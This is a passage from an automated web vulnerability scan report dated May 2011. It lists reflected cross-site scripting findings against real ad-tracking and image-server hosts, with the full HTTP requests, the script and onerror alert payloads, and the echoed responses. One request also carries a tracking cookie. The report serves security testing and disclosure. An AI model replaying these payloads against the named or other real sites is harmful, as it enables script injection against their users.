The value of the sp request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7525b"><script>alert(1)</script>0d9ff59c63a was submitted in the sp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=4&sp=7525b"><script>alert(1)</script>0d9ff59c63a&admeld_call_type=iframe&admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_adprovider_id=24&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://www.telegraph.co.uk/sponsored/travel/disney/8509938/Disney-Cruise-Line-A-world-of-entertainment.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pf=UzQBb_qiX6nr0FKOSBMrL4loZQajlZS6rkFepl0bgHZzsYisygncD_G3QSholkobwYgDN2QBUCNB-f2MyAu5Iq-zuOwmX-HrTHP_QKh0DDi99zZmaeAXB5JqUWuVeu3CdB8okOrIsD5nHq-_Oy6eE6ZJ2sUtm5dhlmrTisFEH-Qb_3kXOMU75B8jogKvtULEAuR9LhkZd1Pd-Bo72tCNnWkHYZEnMGWwdeg40WMiAMgzcOT8yL0M8Y7JHcobYaY7CrcYIpvJPvJ4qVS8lVf1VA4PrJv2xfxYYZ31k7BT2Jc; uid=4325897289836481830; rrs=1; rds=15110; rv=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=4325897289836481830; Domain=.turn.com; Expires=Sat, 12-Nov-2011 01:22:42 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 16 May 2011 01:22:42 GMT
Content-Length: 377

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=4325897289836481830&rnd=2667438275241241951&fpid=4&nu=n&t=&sp=7525b"><script>alert(1)</script>0d9ff59c63a&purl="
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...

5.63. http://s7d5.scene7.com/is/image/bluestembrands/4NL9200000010_A_999 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://s7d5.scene7.com
Path:   /is/image/bluestembrands/4NL9200000010_A_999

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 5c9a7<img%20src%3da%20onerror%3dalert(1)>4bb90ff2d96 was submitted in the REST URL parameter 4. This input was echoed as 5c9a7<img src=a onerror=alert(1)>4bb90ff2d96 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/bluestembrands/4NL9200000010_A_9995c9a7<img%20src%3da%20onerror%3dalert(1)>4bb90ff2d96?$Shoppingcart$ HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 94
Expires: Mon, 16 May 2011 01:38:08 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 01:38:08 GMT
Connection: close
X-N: S

Unable to find /bluestembrands/4NL9200000010_A_9995c9a7<img src=a onerror=alert(1)>4bb90ff2d96

5.64. http://s7d5.scene7.com/is/image/bluestembrands/4NP4530000010_A_999 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://s7d5.scene7.com
Path:   /is/image/bluestembrands/4NP4530000010_A_999

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 7f217<img%20src%3da%20onerror%3dalert(1)>cab1e7f8316 was submitted in the REST URL parameter 4. This input was echoed as 7f217<img src=a onerror=alert(1)>cab1e7f8316 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/bluestembrands/4NP4530000010_A_9997f217<img%20src%3da%20onerror%3dalert(1)>cab1e7f8316?$Shoppingcart$ HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 94
Expires: Mon, 16 May 2011 01:38:32 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 01:38:32 GMT
Connection: close
X-N: S

Unable to find /bluestembrands/4NP4530000010_A_9997f217<img src=a onerror=alert(1)>cab1e7f8316

5.65. http://s7d5.scene7.com/is/image/bluestembrands/4P2023GSG0010_VD_999 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://s7d5.scene7.com
Path:   /is/image/bluestembrands/4P2023GSG0010_VD_999

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 9735b<img%20src%3da%20onerror%3dalert(1)>1263a0f8987 was submitted in the REST URL parameter 4. This input was echoed as 9735b<img src=a onerror=alert(1)>1263a0f8987 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/bluestembrands/4P2023GSG0010_VD_9999735b<img%20src%3da%20onerror%3dalert(1)>1263a0f8987?$Shoppingcart$ HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 95
Expires: Mon, 16 May 2011 01:38:09 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 01:38:09 GMT
Connection: close
X-N: S

Unable to find /bluestembrands/4P2023GSG0010_VD_9999735b<img src=a onerror=alert(1)>1263a0f8987

5.66. http://s7d5.scene7.com/is/image/bluestembrands/F0042_VA_999 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://s7d5.scene7.com
Path:   /is/image/bluestembrands/F0042_VA_999

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 2404c<img%20src%3da%20onerror%3dalert(1)>637bf066978 was submitted in the REST URL parameter 4. This input was echoed as 2404c<img src=a onerror=alert(1)>637bf066978 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/bluestembrands/F0042_VA_9992404c<img%20src%3da%20onerror%3dalert(1)>637bf066978?$ShoppingCart$ HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/section/Electronics/4.uts
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 87
Expires: Mon, 16 May 2011 01:36:56 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 01:36:56 GMT
Connection: close
X-N: S

Unable to find /bluestembrands/F0042_VA_9992404c<img src=a onerror=alert(1)>637bf066978

5.67. http://s7d5.scene7.com/is/image/bluestembrands/F1900_VA_999 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://s7d5.scene7.com
Path:   /is/image/bluestembrands/F1900_VA_999

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f9733<img%20src%3da%20onerror%3dalert(1)>2808e4fabf2 was submitted in the REST URL parameter 4. This input was echoed as f9733<img src=a onerror=alert(1)>2808e4fabf2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/bluestembrands/F1900_VA_999f9733<img%20src%3da%20onerror%3dalert(1)>2808e4fabf2?$ShoppingCart$ HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/section/Electronics/4.uts
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 87
Expires: Mon, 16 May 2011 01:37:01 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 01:37:01 GMT
Connection: close
X-N: S

Unable to find /bluestembrands/F1900_VA_999f9733<img src=a onerror=alert(1)>2808e4fabf2

5.68. http://s7d5.scene7.com/is/image/bluestembrands/F1962_VB_999 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://s7d5.scene7.com
Path:   /is/image/bluestembrands/F1962_VB_999

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 83e01<img%20src%3da%20onerror%3dalert(1)>bd98f124f92 was submitted in the REST URL parameter 4. This input was echoed as 83e01<img src=a onerror=alert(1)>bd98f124f92 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/bluestembrands/F1962_VB_99983e01<img%20src%3da%20onerror%3dalert(1)>bd98f124f92?$ShoppingCart$ HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/section/Electronics/4.uts
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 87
Expires: Mon, 16 May 2011 01:36:36 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 01:36:36 GMT
Connection: close
X-N: S

Unable to find /bluestembrands/F1962_VB_99983e01<img src=a onerror=alert(1)>bd98f124f92

5.69. http://s7d5.scene7.com/is/image/bluestembrands/F2553_WM1_400 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://s7d5.scene7.com
Path:   /is/image/bluestembrands/F2553_WM1_400

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload e4ff5<img%20src%3da%20onerror%3dalert(1)>ff41e0ca3e9 was submitted in the REST URL parameter 4. This input was echoed as e4ff5<img src=a onerror=alert(1)>ff41e0ca3e9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/bluestembrands/F2553_WM1_400e4ff5<img%20src%3da%20onerror%3dalert(1)>ff41e0ca3e9?$ShoppingCart$ HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/section/Electronics/4.uts
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 88
Expires: Mon, 16 May 2011 01:36:54 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 01:36:54 GMT
Connection: close
X-N: S

Unable to find /bluestembrands/F2553_WM1_400e4ff5<img src=a onerror=alert(1)>ff41e0ca3e9

5.70. http://s7d5.scene7.com/is/image/bluestembrands/F5676_VA_999 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://s7d5.scene7.com
Path:   /is/image/bluestembrands/F5676_VA_999

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload cd5b3<img%20src%3da%20onerror%3dalert(1)>f878d452a5d was submitted in the REST URL parameter 4. This input was echoed as cd5b3<img src=a onerror=alert(1)>f878d452a5d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/bluestembrands/F5676_VA_999cd5b3<img%20src%3da%20onerror%3dalert(1)>f878d452a5d?$Shoppingcart$ HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 87
Expires: Mon, 16 May 2011 01:38:37 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 01:38:37 GMT
Connection: close
X-N: S

Unable to find /bluestembrands/F5676_VA_999cd5b3<img src=a onerror=alert(1)>f878d452a5d

5.71. http://s7d5.scene7.com/is/image/bluestembrands/F6580_WM1_400 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://s7d5.scene7.com
Path:   /is/image/bluestembrands/F6580_WM1_400

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 4aa71<img%20src%3da%20onerror%3dalert(1)>1a9d311f4da was submitted in the REST URL parameter 4. This input was echoed as 4aa71<img src=a onerror=alert(1)>1a9d311f4da in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/bluestembrands/F6580_WM1_4004aa71<img%20src%3da%20onerror%3dalert(1)>1a9d311f4da?$Shoppingcart$ HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/section/Electronics/4.uts
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 88
Expires: Mon, 16 May 2011 01:37:27 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 01:37:27 GMT
Connection: close
X-N: S

Unable to find /bluestembrands/F6580_WM1_4004aa71<img src=a onerror=alert(1)>1a9d311f4da

5.72. http://s7d5.scene7.com/is/image/bluestembrands/F8394_WM1_400 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://s7d5.scene7.com
Path:   /is/image/bluestembrands/F8394_WM1_400

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a8590<img%20src%3da%20onerror%3dalert(1)>cea58b0fddf was submitted in the REST URL parameter 4. This input was echoed as a8590<img src=a onerror=alert(1)>cea58b0fddf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/bluestembrands/F8394_WM1_400a8590<img%20src%3da%20onerror%3dalert(1)>cea58b0fddf?$ShoppingCart$ HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/section/Electronics/4.uts
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 88
Expires: Mon, 16 May 2011 01:36:58 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 01:36:58 GMT
Connection: close
X-N: S

Unable to find /bluestembrands/F8394_WM1_400a8590<img src=a onerror=alert(1)>cea58b0fddf

5.73. http://s7d5.scene7.com/is/image/bluestembrands/NA908_WM1_400 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://s7d5.scene7.com
Path:   /is/image/bluestembrands/NA908_WM1_400

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b6dec<img%20src%3da%20onerror%3dalert(1)>f0004a86363 was submitted in the REST URL parameter 4. This input was echoed as b6dec<img src=a onerror=alert(1)>f0004a86363 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/bluestembrands/NA908_WM1_400b6dec<img%20src%3da%20onerror%3dalert(1)>f0004a86363?$Shoppingcart$ HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/section/Electronics/4.uts
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 88
Expires: Mon, 16 May 2011 01:37:38 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 01:37:38 GMT
Connection: close
X-N: S

Unable to find /bluestembrands/NA908_WM1_400b6dec<img src=a onerror=alert(1)>f0004a86363

5.74. http://s7d5.scene7.com/is/image/bluestembrands/NB750_WVA_999 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://s7d5.scene7.com
Path:   /is/image/bluestembrands/NB750_WVA_999

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 86ccf<img%20src%3da%20onerror%3dalert(1)>60ec1845695 was submitted in the REST URL parameter 4. This input was echoed as 86ccf<img src=a onerror=alert(1)>60ec1845695 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/bluestembrands/NB750_WVA_99986ccf<img%20src%3da%20onerror%3dalert(1)>60ec1845695?$Shoppingcart$ HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/section/Electronics/4.uts
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 88
Expires: Mon, 16 May 2011 01:37:46 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 01:37:46 GMT
Connection: close
X-N: S

Unable to find /bluestembrands/NB750_WVA_99986ccf<img src=a onerror=alert(1)>60ec1845695

5.75. http://s7d5.scene7.com/is/image/bluestembrands/NC208_WM1_400 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://s7d5.scene7.com
Path:   /is/image/bluestembrands/NC208_WM1_400

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 404ad<img%20src%3da%20onerror%3dalert(1)>62a27b752f2 was submitted in the REST URL parameter 4. This input was echoed as 404ad<img src=a onerror=alert(1)>62a27b752f2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/bluestembrands/NC208_WM1_400404ad<img%20src%3da%20onerror%3dalert(1)>62a27b752f2?$ShoppingCart$ HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/section/Electronics/4.uts
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 88
Expires: Mon, 16 May 2011 01:37:24 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 01:37:24 GMT
Connection: close
X-N: S

Unable to find /bluestembrands/NC208_WM1_400404ad<img src=a onerror=alert(1)>62a27b752f2

5.76. http://s7d5.scene7.com/is/image/bluestembrands/NC330_VA_999 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://s7d5.scene7.com
Path:   /is/image/bluestembrands/NC330_VA_999

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 18191<img%20src%3da%20onerror%3dalert(1)>ab0ea8c729c was submitted in the REST URL parameter 4. This input was echoed as 18191<img src=a onerror=alert(1)>ab0ea8c729c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/bluestembrands/NC330_VA_99918191<img%20src%3da%20onerror%3dalert(1)>ab0ea8c729c?$Shoppingcart$ HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/section/Electronics/4.uts
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 87
Expires: Mon, 16 May 2011 01:37:28 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 01:37:28 GMT
Connection: close
X-N: S

Unable to find /bluestembrands/NC330_VA_99918191<img src=a onerror=alert(1)>ab0ea8c729c

5.77. http://s7d5.scene7.com/is/image/bluestembrands/NC364_VA_999 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://s7d5.scene7.com
Path:   /is/image/bluestembrands/NC364_VA_999

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b8d30<img%20src%3da%20onerror%3dalert(1)>fb38cf8420b was submitted in the REST URL parameter 4. This input was echoed as b8d30<img src=a onerror=alert(1)>fb38cf8420b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/bluestembrands/NC364_VA_999b8d30<img%20src%3da%20onerror%3dalert(1)>fb38cf8420b?$ShoppingCart$ HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/section/Electronics/4.uts
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 87
Expires: Mon, 16 May 2011 01:37:05 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 01:37:05 GMT
Connection: close
X-N: S

Unable to find /bluestembrands/NC364_VA_999b8d30<img src=a onerror=alert(1)>fb38cf8420b

5.78. http://s7d5.scene7.com/is/image/bluestembrands/NC873_WM1_400 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://s7d5.scene7.com
Path:   /is/image/bluestembrands/NC873_WM1_400

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ed961<img%20src%3da%20onerror%3dalert(1)>74de159628d was submitted in the REST URL parameter 4. This input was echoed as ed961<img src=a onerror=alert(1)>74de159628d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/bluestembrands/NC873_WM1_400ed961<img%20src%3da%20onerror%3dalert(1)>74de159628d?$Shoppingcart$ HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/section/Electronics/4.uts
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 88
Expires: Mon, 16 May 2011 01:37:42 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 01:37:42 GMT
Connection: close
X-N: S

Unable to find /bluestembrands/NC873_WM1_400ed961<img src=a onerror=alert(1)>74de159628d

5.79. http://s7d5.scene7.com/is/image/bluestembrands/ND797_VA_999 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://s7d5.scene7.com
Path:   /is/image/bluestembrands/ND797_VA_999

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 4cb2f<img%20src%3da%20onerror%3dalert(1)>9829a3c9865 was submitted in the REST URL parameter 4. This input was echoed as 4cb2f<img src=a onerror=alert(1)>9829a3c9865 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/bluestembrands/ND797_VA_9994cb2f<img%20src%3da%20onerror%3dalert(1)>9829a3c9865?$ShoppingCart$ HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/section/Electronics/4.uts
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
